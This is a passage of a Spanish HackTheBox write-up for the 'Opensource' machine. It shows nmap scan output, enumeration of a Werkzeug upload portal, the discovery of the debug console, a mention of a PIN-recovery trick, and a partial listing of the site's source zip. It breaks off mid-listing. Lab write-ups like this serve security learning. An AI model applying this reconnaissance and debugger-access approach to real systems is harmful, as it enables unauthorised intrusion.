Opensource es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Fácil.
En este caso se trata de una máquina basada en el Sistema Operativo Linux.
Índice
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Opensource 10.10.11.164 a /etc/hosts como opensource.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 |
nmap -sV -sC -oA enumeration/nmap1 10.10.11.164 Nmap scan report for opensource.htb (10.10.11.164) Host is up (0.34s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 1e:59:05:7c:a9:58:c9:23:90:0f:75:23:82:3d:05:5f (RSA) | 256 48:a8:53:e7:e0:08:aa:1d:96:86:52:bb:88:56:a0:b7 (ECDSA) |_ 256 02:1f:97:9e:3c:8e:7a:1c:7c:af:9d:5a:25:4b:b8:c8 (ED25519) 80/tcp open http Werkzeug/2.1.2 Python/3.10.3 | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Server: Werkzeug/2.1.2 Python/3.10.3 | Date: Sat, 23 Jul 2022 18:10:35 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 5316 | Connection: close | <html lang="en"> | <head> | <meta charset="UTF-8"> | <meta name="viewport" content="width=device-width, initial-scale=1.0"> | <title>upcloud - Upload files for Free!</title> | <script src="/static/vendor/jquery/jquery-3.4.1.min.js"></script> | <script src="/static/vendor/popper/popper.min.js"></script> | <script src="/static/vendor/bootstrap/js/bootstrap.min.js"></script> | <script src="/static/js/ie10-viewport-bug-workaround.js"></script> | <link rel="stylesheet" href="/static/vendor/bootstrap/css/bootstrap.css"/> | <link rel="stylesheet" href=" /static/vendor/bootstrap/css/bootstrap-grid.css"/> | <link rel="stylesheet" href=" /static/vendor/bootstrap/css/bootstrap-reboot.css"/> | <link rel= | HTTPOptions: | HTTP/1.1 200 OK | Server: Werkzeug/2.1.2 Python/3.10.3 | Date: Sat, 23 Jul 2022 18:10:36 GMT | Content-Type: text/html; charset=utf-8 | Allow: HEAD, GET, OPTIONS | Content-Length: 0 | Connection: close | RTSPRequest: | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" | "http://www.w3.org/TR/html4/strict.dtd"> | <html> | <head> | <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> | <title>Error response</title> | </head> | <body> | <h1>Error response</h1> | <p>Error code: 400</p> | <p>Message: Bad request version ('RTSP/1.0').</p> | <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p> | </body> |_ </html> |_http-title: upcloud - Upload files for Free! |_http-server-header: Werkzeug/2.1.2 Python/3.10.3 3000/tcp filtered ppp 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port80-TCP:V=7.92%I=7%D=7/23%Time=62DC399B%P=x86_64-pc-linux-gnu%r(GetR SF:equest,1573,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/2\.1\.2\x20P SF:ython/3\.10\.3\r\nDate:\x20Sat,\x2023\x20Jul\x202022\x2018:10:35\x20GMT SF:\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20 SF:5316\r\nConnection:\x20close\r\n\r\n<html\x20lang=\"en\">\n<head>\n\x20 SF:\x20\x20\x20<meta\x20charset=\"UTF-8\">\n\x20\x20\x20\x20<meta\x20name= SF:\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\ SF:n\x20\x20\x20\x20<title>upcloud\x20-\x20Upload\x20files\x20for\x20Free! SF:</title>\n\n\x20\x20\x20\x20<script\x20src=\"/static/vendor/jquery/jque SF:ry-3\.4\.1\.min\.js\"></script>\n\x20\x20\x20\x20<script\x20src=\"/stat SF:ic/vendor/popper/popper\.min\.js\"></script>\n\n\x20\x20\x20\x20<script SF:\x20src=\"/static/vendor/bootstrap/js/bootstrap\.min\.js\"></script>\n\ SF:x20\x20\x20\x20<script\x20src=\"/static/js/ie10-viewport-bug-workaround SF:\.js\"></script>\n\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href SF:=\"/static/vendor/bootstrap/css/bootstrap\.css\"/>\n\x20\x20\x20\x20<li SF:nk\x20rel=\"stylesheet\"\x20href=\"\x20/static/vendor/bootstrap/css/boo SF:tstrap-grid\.css\"/>\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20hr SF:ef=\"\x20/static/vendor/bootstrap/css/bootstrap-reboot\.css\"/>\n\n\x20 SF:\x20\x20\x20<link\x20rel=")%r(HTTPOptions,C7,"HTTP/1\.1\x20200\x20OK\r\ SF:nServer:\x20Werkzeug/2\.1\.2\x20Python/3\.10\.3\r\nDate:\x20Sat,\x2023\ SF:x20Jul\x202022\x2018:10:36\x20GMT\r\nContent-Type:\x20text/html;\x20cha SF:rset=utf-8\r\nAllow:\x20HEAD,\x20GET,\x20OPTIONS\r\nContent-Length:\x20 SF:0\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTM SF:L\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x SF:20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x SF:20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equ SF:iv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x SF:20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x2 SF:0</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>E SF:rror\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code SF::\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20req SF:uest\x20version\x20\('RTSP/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\ SF:x20<p>Error\x20code\x20explanation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20 SF:Bad\x20request\x20syntax\x20or\x20unsupported\x20method\.</p>\n\x20\x20 SF:\x20\x20</body>\n</html>\n"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jul 23 18:12:44 2022 -- 1 IP address (1 host up) scanned in 250.52 seconds |
Encontramos tres puertos, el 22 para el que no tenemos credenciales, el 3000 al cual no llegamos y el 80 donde hay un portal web, y que será nuestro próximo paso.
Enumeración
Comenzamos revisando el portal web en el puerto 80 y vemos la siguiente ventana
Navegamos un poco por la página y descubrimos dos cosas interesantes, un enlace a la descarga de un fichero .zip y un enlace a la url /uploud
En este portal no vemos mucho más así que vamos a investigar el portal de upcloud que luce así
Hacemos alguna prueba de subir diferentes tipos de ficheros, pero tampoco conseguimos nada interesante así que vamos a burp a ver que podemos obtener.
Tratamos de provocar errores en la aplicación y conseguimos unos datos interesantes al dejar el campo filename vacío
Si nos fijamos en el error observamos que el portal utiliza el framework Werkzeug Debugger como debug de la aplicación, así que buscamos un poco de información sobre ella y vamos a navegar a la url de la consola de la misma.
Aunque como era de esperar, no iba a ser tan fácil, necesitamos un pin para poder llegar a la consola, pero no disponemos de uno así que buscamos alguna vulnerabilidad y encontramos un script que nos permite obtener dicho pin y que explica en la web de HackTricks.
Revisando el portal necesitamos que esté activado el modo debug así que vamos a buscar en el fichero zip a ver que podemos descubrir.
En el mismo encontramos los siguientes ficheros:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 |
$ unzip -v source.zip Archive: source.zip Length Method Size Cmpr Date Time CRC-32 Name -------- ------ ------- ---- ---------- ----- -------- ---- 0 Stored 0 0% 04-28-2022 13:45 00000000 app/ 0 Stored 0 0% 04-28-2022 14:50 00000000 app/app/ 707 Defl:N 310 56% 04-28-2022 14:50 0b37879b app/app/views.py 262 Defl:N 160 39% 04-28-2022 13:34 3560fae7 app/app/__init__.py 0 Stored 0 0% 04-28-2022 13:39 00000000 app/app/static/ 0 Stored 0 0% 04-28-2022 13:34 00000000 app/app/static/js/ 1920 Defl:N 691 64% 04-28-2022 13:34 975a2465 app/app/static/js/script.js 668 Defl:N 404 40% 04-28-2022 13:34 3a81094a app/app/static/js/ie10-viewport-bug-workaround.js 0 Stored 0 0% 04-28-2022 13:34 00000000 app/app/static/vendor/ 0 Stored 0 0% 04-28-2022 13:34 00000000 app/app/static/vendor/bootstrap/ 0 Stored 0 0% 04-28-2022 13:34 00000000 app/app/static/vendor/bootstrap/js/ 80698 Defl:N 22723 72% 04-28-2022 13:34 b6b2ca06 app/app/static/vendor/bootstrap/js/bootstrap.bundle.min.js 194435 Defl:N 47258 76% 04-28-2022 13:34 713a8cbd app/app/static/vendor/bootstrap/js/bootstrap.min.js.map 256099 Defl:N 59648 77% 04-28-2022 13:34 dec71e0e app/app/static/vendor/bootstrap/js/bootstrap.js.map 135079 Defl:N 25618 81% 04-28-2022 13:34 39ff8eef app/app/static/vendor/bootstrap/js/bootstrap.js 318045 Defl:N 83081 74% 04-28-2022 13:34 4e3f8238 app/app/static/vendor/bootstrap/js/bootstrap.bundle.min.js.map 227980 Defl:N 48777 79% 04-28-2022 13:34 3913fd07 app/app/static/vendor/bootstrap/js/bootstrap.bundle.js 410007 Defl:N 93545 77% 04-28-2022 13:34 482d446d app/app/static/vendor/bootstrap/js/bootstrap.bundle.js.map 60010 Defl:N 15847 74% 04-28-2022 13:34 bafa3e29 app/app/static/vendor/bootstrap/js/bootstrap.min.js 0 Stored 0 0% 04-28-2022 13:34 00000000 app/app/static/vendor/bootstrap/css/ 504418 Defl:N 100444 80% 04-28-2022 13:34 e445c913 app/app/static/vendor/bootstrap/css/bootstrap.css.map 32546 Defl:N 8156 75% 04-28-2022 13:34 390a02bf app/app/static/vendor/bootstrap/css/bootstrap-reboot.min.css.map 50935 Defl:N 6176 88% 04-28-2022 13:34 81a6cda5 app/app/static/vendor/bootstrap/css/bootstrap-grid.min.css 115021 Defl:N 14490 87% 04-28-2022 13:34 ee59b49c app/app/static/vendor/bootstrap/css/bootstrap-grid.min.css.map 67871 Defl:N 7091 90% 04-28-2022 13:34 0a8bc033 app/app/static/vendor/bootstrap/css/bootstrap-grid.css 157964 Defl:N 27749 82% 04-28-2022 13:34 daf22781 app/app/static/vendor/bootstrap/css/bootstrap-grid.css.map 197170 Defl:N 25914 87% 04-28-2022 13:34 47747fd4 app/app/static/vendor/bootstrap/css/bootstrap.css 4793 Defl:N 1691 65% 04-28-2022 13:34 47bb1bec app/app/static/vendor/bootstrap/css/bootstrap-reboot.css 641867 Defl:N 103885 84% 04-28-2022 13:34 ce0118b7 app/app/static/vendor/bootstrap/css/bootstrap.min.css.map 77346 Defl:N 17275 78% 04-28-2022 13:34 1c6139ea app/app/static/vendor/bootstrap/css/bootstrap-reboot.css.map 3927 Defl:N 1584 60% 04-28-2022 13:34 0c8576f0 app/app/static/vendor/bootstrap/css/bootstrap-reboot.min.css 159515 Defl:N 23592 85% 04-28-2022 13:34 4e48b380 app/app/static/vendor/bootstrap/css/bootstrap.min.css 0 Stored 0 0% 04-28-2022 13:34 00000000 app/app/static/vendor/font-awesome/ 59344 Defl:N 12814 78% 04-28-2022 13:34 8cac5ff5 app/app/static/vendor/font-awesome/all.min.css 0 Stored 0 0% 04-28-2022 13:34 00000000 app/app/static/vendor/popper/ 36692 Defl:N 9687 74% 04-28-2022 13:34 d029fa28 app/app/static/vendor/popper/popper-utils.js 53858 Defl:N 15453 71% 04-28-2022 13:34 5998df74 app/app/static/vendor/popper/popper-utils.min.js.map 3114 Defl:N 994 68% 04-28-2022 13:34 a45f3f4d app/app/static/vendor/popper/popper.js.flow 140875 Defl:N 40202 72% 04-28-2022 13:34 1bcf6894 app/app/static/vendor/popper/popper.js.map 61884 Defl:N 17780 71% 04-28-2022 13:34 81ab804e app/app/static/vendor/popper/popper-utils.js.map 123890 Defl:N 35381 71% 04-28-2022 13:34 b2abe30b app/app/static/vendor/popper/popper.min.js.map 10831 Defl:N 4166 62% 04-28-2022 13:34 9554d60f app/app/static/vendor/popper/popper-utils.min.js 21257 Defl:N 7508 65% 04-28-2022 13:34 e3404892 app/app/static/vendor/popper/popper.min.js 88768 Defl:N 22589 75% 04-28-2022 13:34 7dee74b1 app/app/static/vendor/popper/popper.js 0 Stored 0 0% 04-28-2022 13:34 00000000 app/app/static/vendor/jquery/ 88145 Defl:N 30572 65% 04-28-2022 13:34 5be48651 app/app/static/vendor/jquery/jquery-3.4.1.min.js 280364 Defl:N 83136 70% 04-28-2022 13:34 17190ba3 app/app/static/vendor/jquery/jquery-3.4.1.js 136409 Defl:N 54634 60% 04-28-2022 13:34 89d9dfae app/app/static/vendor/jquery/jquery-3.4.1.min.map 0 Stored 0 0% 04-28-2022 13:34 00000000 app/app/static/css/ 1162 Defl:N 462 60% 04-28-2022 13:34 e17dfa2f app/app/static/css/style.css 0 Stored 0 0% 04-28-2022 13:34 00000000 app/app/templates/ 1666 Defl:N 573 66% 04-28-2022 13:34 94872c59 app/app/templates/success.html 1631 Defl:N 560 66% 04-28-2022 13:34 88f8c2fb app/app/templates/upload.html 5533 Defl:N 1799 68% 04-28-2022 13:34 cb749443 app/app/templates/index.html 816 Defl:N 340 58% 04-28-2022 13:34 350e39b7 app/app/utils.py 332 Defl:N 180 46% 04-28-2022 13:34 c9fba34e app/app/configuration.py 141 Defl:N 114 19% 04-28-2022 13:34 b103be2f app/run.py 0 Stored 0 0% 04-28-2022 13:34 00000000 app/public/ 0 Stored 0 0% 04-28-2022 13:34 00000000 app/public/uploads/ 0 Stored 0 0% 04-28-2022 13:46 00000000 app/.vscode/ 0 Stored 0 0% 04-28-2022 13:34 00000000 app/INSTALL.md 110 Defl:N 78 29% 04-28-2022 13:40 11993293 build-docker.sh 0 Stored 0 0% 04-28-2022 13:34 00000000 config/ 253 Defl:N 137 46% 04-28-2022 13:34 d1b7915b config/supervisord.conf 574 Defl:N 338 41% 04-28-2022 14:50 8c686a2d Dockerfile 0 Stored 0 0% 04-28-2022 14:50 00000000 .git/ 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/branches/ 73 Defl:N 63 14% 04-28-2022 13:45 1f078b37 .git/description 92 Defl:N 79 14% 04-28-2022 13:45 c1003537 .git/config 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/info/ 240 Defl:N 173 28% 04-28-2022 13:45 21cd3d77 .git/info/exclude 0 Stored 0 0% 04-28-2022 13:55 00000000 .git/objects/ 0 Stored 0 0% 04-28-2022 13:55 00000000 .git/objects/01/ 156 Stored 156 0% 04-28-2022 13:55 6f1f5573 .git/objects/01/c76bb30cbd05b810719576d79b5535a56475f1 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/11/ 54 Stored 54 0% 04-28-2022 13:45 6a443d97 .git/objects/11/3af9958c392c6d0212475bf4c7581aff34e857 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/85/ 353 Stored 353 0% 04-28-2022 13:45 2b24c34a .git/objects/85/643d0e06aa610d2d6ed0c45ebf6dd82c458570 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/1b/ 92 Stored 92 0% 04-28-2022 13:45 c66ab382 .git/objects/1b/762678bd7ccbfd0fed00090ace78df893583d1 19875 Defl:N 18772 6% 04-28-2022 13:45 e05a0cff .git/objects/1b/393db3e482ab736dd3873389c279195992e32d 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/53/ 1698 Stored 1698 0% 04-28-2022 13:45 e341e81f .git/objects/53/08df61af3cc99e54552086213bdf1b8af4af31 62834 Defl:N 62844 0% 04-28-2022 13:45 3eb7232e .git/objects/53/4452210e7129a8a33f14a29996c060ab69fad1 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/82/ 101 Stored 101 0% 04-28-2022 13:45 0d3fccff .git/objects/82/8b110e78e2662f04a6b450794ea6a143b856d0 0 Stored 0 0% 04-28-2022 13:46 00000000 .git/objects/ec/ 147 Stored 147 0% 04-28-2022 13:46 6f985de7 .git/objects/ec/dcff58f44abdd59b1604d9defad47ae9ac014a 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/b9/ 138152 Defl:N 136674 1% 04-28-2022 13:45 5f761b26 .git/objects/b9/39eb6f394c22a5df6277b881e7d86fc6975797 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/b8/ 9610 Stored 9610 0% 04-28-2022 13:45 7f18fd42 .git/objects/b8/551f7c0f0060c97ad5e0a348fec522d7e26247 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/b3/ 420 Stored 420 0% 04-28-2022 13:45 512bb529 .git/objects/b3/35ef943e6e59799cded40fe3581dbeb3a0e304 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/37/ 155 Stored 155 0% 04-28-2022 13:45 6bbceb5f .git/objects/37/e4fddd6afde7f29122ea9854f6f00708eef9cc 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/86/ 35150 Defl:N 33618 4% 04-28-2022 13:45 cca37432 .git/objects/86/61e3e354d62d2443029226e2ff98681ac8d19d 31622 Defl:N 31111 2% 04-28-2022 13:45 3c98280b .git/objects/86/b6845bc342029a92ad908781435f95f000fabb 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/50/ 21452 Stored 21452 0% 04-28-2022 13:45 e092862b .git/objects/50/e078af7758688b22e38524442f84b2916c195d 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/29/ 1973 Stored 1973 0% 04-28-2022 13:45 2b63fa98 .git/objects/29/218c7abb8d1eef5ae1a565f4215859a5e04e2c 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/93/ 121134 Defl:N 121154 0% 04-28-2022 13:45 f257b95f .git/objects/93/cf73e9c5dc8bf95c8f530db5b8ba841d3d1a4d 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/87/ 195 Stored 195 0% 04-28-2022 13:45 bb362729 .git/objects/87/7f2911abd7c04bcce9d42049d86c73c671e8bc 0 Stored 0 0% 04-28-2022 13:46 00000000 .git/objects/aa/ 219 Stored 219 0% 04-28-2022 13:46 659af154 .git/objects/aa/9fb67aa733586ee65dc406d6806b21015640e5 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/91/ 1864 Stored 1864 0% 04-28-2022 13:45 10524775 .git/objects/91/b0fc4c816cd0acedb996444c4d3ec6703e3805 501 Stored 501 0% 04-28-2022 13:45 122a1e47 .git/objects/91/e52aff2d47925152a36ce0dd5b699eba389e99 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/25/ 10357 Defl:N 9762 6% 04-28-2022 13:45 9b19b069 .git/objects/25/9a9e2c65738b9d749872c944e423531fd92159 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/info/ 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/76/ 368 Stored 368 0% 04-28-2022 13:45 58acafba .git/objects/76/c7768054872091618fa842fac99591c5025edf 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/8a/ 8378 Stored 8378 0% 04-28-2022 13:45 f9009d2e .git/objects/8a/17212f7dba4ce8b961eff7efe8ef5ba8c60844 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/ee/ 374 Stored 374 0% 04-28-2022 13:45 bfbf4e8b .git/objects/ee/bf49dda43477217cd8fad2458f1057a81bd1f5 117 Stored 117 0% 04-28-2022 13:45 f1b5f182 .git/objects/ee/9d9f1ef9156c787d53074493e39ae364cd1e05 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/pack/ 0 Stored 0 0% 04-28-2022 13:46 00000000 .git/objects/e5/ 77504 Defl:N 77519 0% 04-28-2022 13:45 870f49d2 .git/objects/e5/f6ce91b3818406be808fdd80b86fc7db5c588b 163 Stored 163 0% 04-28-2022 13:46 6eb2d17f .git/objects/e5/0a290eba9e29c5dea26df2a512361d400e93eb 19595 Stored 19595 0% 04-28-2022 13:45 9ec36f0c .git/objects/e5/a242994035de13059fe6f1fe974bf35a2291e1 156 Stored 156 0% 04-28-2022 13:46 6fbefb26 .git/objects/e5/7842ccd63e316712011d87445a9022e83576e9 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/a3/ 107 Stored 107 0% 04-28-2022 13:45 ae800fc7 .git/objects/a3/d005ade1721d0c87ec4287ed0e60b53f63d569 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/5c/ 176 Stored 176 0% 04-28-2022 13:45 9f147e05 .git/objects/5c/2ecc06a02ed69a5253b7154485b0e2c606aa36 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/70/ 21269 Stored 21269 0% 04-28-2022 13:45 60af90c2 .git/objects/70/1f6715c2c754ca5f03d1009a949400354160b2 0 Stored 0 0% 04-28-2022 13:47 00000000 .git/objects/08/ 367 Stored 367 0% 04-28-2022 13:47 104a3988 .git/objects/08/75edac6822cf53d0045bc4476e0bd522d29d9d 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/77/ 101394 Defl:N 101414 0% 04-28-2022 13:45 f45e195f .git/objects/77/3ad95c56f8321eb4901736930024ec517a948a 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/7f/ 18417 Stored 18417 0% 04-28-2022 13:45 6bb5d62e .git/objects/7f/da3a91d07531f3ba02c93248631bccc4ddda8a 28052 Stored 28052 0% 04-28-2022 13:45 17ddf6e3 .git/objects/7f/a913deacc3b7847486fae18020a4831f2b51b6 0 Stored 0 0% 04-28-2022 13:55 00000000 .git/objects/5b/ 355 Stored 355 0% 04-28-2022 13:55 a976cffb .git/objects/5b/0553c0d960b11bb7fd04da3fa5e37020f35db2 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/e1/ 14767 Stored 14767 0% 04-28-2022 13:45 1f837502 .git/objects/e1/e271c00e31d309e9bab411caeef86d6d6d0d57 63344 Defl:N 63354 0% 04-28-2022 13:45 1d75747f .git/objects/e1/5edef2c718c3e0f6050a1d4e6d749386296e0d 0 Stored 0 0% 04-28-2022 13:47 00000000 .git/objects/8f/ 190 Stored 190 0% 04-28-2022 13:47 6ae2f179 .git/objects/8f/f2027d53c22e75460200977dd966773933c30c 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/31/ 626 Stored 626 0% 04-28-2022 13:45 c5b9eda0 .git/objects/31/6cd1d162be732601b26c1b9f46546d8b1209c5 0 Stored 0 0% 04-28-2022 13:46 00000000 .git/objects/a7/ 145 Stored 145 0% 04-28-2022 13:46 583aa541 .git/objects/a7/6f8f75f7a4a12b706b0cf9c983796fa1985820 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/fd/ 610 Stored 610 0% 04-28-2022 13:45 5931a5b6 .git/objects/fd/19858d0b3269448cf5f2cd3a988727a27415a4 0 Stored 0 0% 04-28-2022 13:46 00000000 .git/objects/0f/ 393 Stored 393 0% 04-28-2022 13:46 e11bba41 .git/objects/0f/3cc379de048a55642009ee899132cb04f84c6e 0 Stored 0 0% 04-28-2022 13:46 00000000 .git/objects/9d/ 219 Stored 219 0% 04-28-2022 13:55 40310155 .git/objects/9d/a413163072158640354b63db1d82cae4367bee 58 Stored 58 0% 04-28-2022 13:46 a47edea9 .git/objects/9d/e5383aec4b81e320b29a4ff0f16a3a33f60da9 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/a1/ 35754 Defl:N 35764 0% 04-28-2022 13:45 4b4b5dd9 .git/objects/a1/c07fd803b5fc9c54f44e31123ae4fa11e134b0 155 Stored 155 0% 04-28-2022 13:45 57836722 .git/objects/a1/4dd360b1fdf481873dcbd288c9037b934970bc 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/b6/ 129 Stored 129 0% 04-28-2022 13:45 c62ae3d2 .git/objects/b6/4e36b749bcca1e16eabde17ccc77e218d78f6a 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/5a/ 71 Stored 71 0% 04-28-2022 13:45 f518c569 .git/objects/5a/3c83058128500ebcf9b32c1937d18375c1a3e4 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/a8/ 11702 Stored 11702 0% 04-28-2022 13:45 7d73ed00 .git/objects/a8/8adb24679db295091b507cf9aec34286cb4b26 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/5f/ 61 Stored 61 0% 04-28-2022 13:45 0be853e5 .git/objects/5f/189204957c5ca59d8c196700f981a0bc1f3382 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/4f/ 116 Stored 116 0% 04-28-2022 13:45 c3d17523 .git/objects/4f/bc8b1fefcef63e9ad49a0e222ff995562d9d58 0 Stored 0 0% 04-28-2022 13:46 00000000 .git/objects/f6/ 190 Stored 190 0% 04-28-2022 13:46 463a9102 .git/objects/f6/09a935fc30dfb68dd7ac49ae040d08e81f507d 4542 Stored 4542 0% 04-28-2022 13:45 2fec4543 .git/objects/f6/560a15ede1d0bb198ab25f91368fd503356de3 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/54/ 103757 Defl:N 103777 0% 04-28-2022 13:45 cd84d1d4 .git/objects/54/d2495018b0d93630a2ce0811fd246fafbcd569 0 Stored 0 0% 04-28-2022 13:46 00000000 .git/objects/59/ 163 Stored 163 0% 04-28-2022 13:46 39fbe149 .git/objects/59/75e3fdba44cebb64414efbfb80ac26553718a4 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/f1/ 34043 Defl:N 34053 0% 04-28-2022 13:45 4777c2fe .git/objects/f1/e68d3190fb90ef5ae4ba6672efc19186771aca 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/8e/ 35560 Defl:N 35204 1% 04-28-2022 13:45 a8b6fe69 .git/objects/8e/ac957a5120eb7e5a6b1f838cfcac1fbd5653c9 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/75/ 59835 Defl:N 59845 0% 04-28-2022 13:45 f78b37b3 .git/objects/75/7dbf30c59149020cdf78577e8a5c08e3c9209d 0 Stored 0 0% 04-28-2022 13:55 00000000 .git/objects/2c/ 167 Stored 167 0% 04-28-2022 13:55 739849e5 .git/objects/2c/67a52253c6fe1f206ad82ba747e43208e8cfd9 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/78/ 27727 Stored 27727 0% 04-28-2022 13:45 7ca805ac .git/objects/78/c533b4e7ecb48d0da3017e1361c05765ff43c9 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/40/ 744 Stored 744 0% 04-28-2022 13:45 2b135d45 .git/objects/40/1c74464f72ee6ed272d285e6fafc62448b0a33 118 Stored 118 0% 04-28-2022 13:45 55775271 .git/objects/40/9ca91f74588be526c7ab87e5c2154f7034310e 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/d5/ 1100 Stored 1100 0% 04-28-2022 13:45 686927ed .git/objects/d5/6fdda243544fedc531908ad92a82d892e7f308 0 Stored 0 0% 04-28-2022 13:47 00000000 .git/objects/c4/ 151 Stored 151 0% 04-28-2022 13:47 e71739af .git/objects/c4/1fedef2ec6df98735c11b2faf1e79ef492a0f3 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/7a/ 250 Stored 250 0% 04-28-2022 13:45 8fa60389 .git/objects/7a/92370b5b844a1008400ba6b7069bcf030ffcfb 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/65/ 8803 Defl:N 8320 6% 04-28-2022 13:45 e300fffb .git/objects/65/33f319a8a39c9164dbcec7fce73b0ac9dc087b 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/0d/ 56 Stored 56 0% 04-28-2022 13:45 f53b3d7f .git/objects/0d/cad638424fdd8add9a50ab779616d425199245 0 Stored 0 0% 04-28-2022 13:46 00000000 .git/objects/be/ 150 Stored 150 0% 04-28-2022 13:46 54358b8f .git/objects/be/4da71987bbbc8fae7c961fb2de01ebd0be1997 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/71/ 42131 Defl:N 42141 0% 04-28-2022 13:45 fc24b74c .git/objects/71/07f613cf77c4450a1380ce3ef092f640c346a1 116 Stored 116 0% 04-28-2022 13:55 25602cf1 .git/objects/71/9e506f4dfc00174a943d4470b1f4b763aa2bfa 0 Stored 0 0% 